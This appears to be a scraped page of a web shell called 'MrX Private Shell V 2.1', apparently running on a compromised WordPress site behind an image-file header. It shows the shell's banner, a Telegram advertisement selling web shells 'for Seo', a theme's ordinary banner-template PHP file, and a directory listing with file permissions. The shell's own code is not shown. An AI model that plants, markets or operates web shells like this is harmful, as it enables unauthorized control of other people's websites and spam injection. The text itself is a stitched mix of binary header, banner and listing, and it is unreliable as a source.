����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
global $post, $homey_prefix;
$post_id = isset($post->ID) ? $post->ID : '';
if(empty($post_id)) {
return;
}
$banner_type = get_post_meta($post->ID, $homey_prefix.'header_type', true);
if( $banner_type == 'parallax' ) {
get_template_part('template-parts/banner/parallax');
} elseif( $banner_type == 'video' ) {
get_template_part('template-parts/banner/video');
} elseif( $banner_type == 'map' ) {
get_template_part('template-parts/banner/map');
} elseif( $banner_type == 'experiences_map' ) {
get_template_part('template-parts/banner/map_experiences');
} elseif( $banner_type == 'slider' ) {
get_template_part('template-parts/banner/slider');
} elseif( $banner_type == 'experiences_slider' ) {
get_template_part('template-parts/banner/slider-exp');
} elseif( $banner_type == 'rev_slider' ) {
get_template_part('template-parts/banner/revolution-slider');
} elseif( $banner_type == 'half_search' ) {
if(homey_is_experiences_page()){
get_template_part('template-parts/banner/half-search-exp');
}else{
get_template_part('template-parts/banner/half-search');
}
}
?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| caption-exp.php | File | 740 B | 0644 |
|
| caption.php | File | 732 B | 0644 |
|
| half-search-exp.php | File | 1.01 KB | 0644 |
|
| half-search.php | File | 1 KB | 0644 |
|
| main.php | File | 1.1 KB | 0644 |
|
| map.php | File | 793 B | 0644 |
|
| map_experiences.php | File | 364 B | 0644 |
|
| parallax.php | File | 877 B | 0644 |
|
| revolution-slider.php | File | 786 B | 0644 |
|
| slider-exp.php | File | 5.23 KB | 0644 |
|
| slider.php | File | 7.23 KB | 0644 |
|
| video.php | File | 1.62 KB | 0644 |
|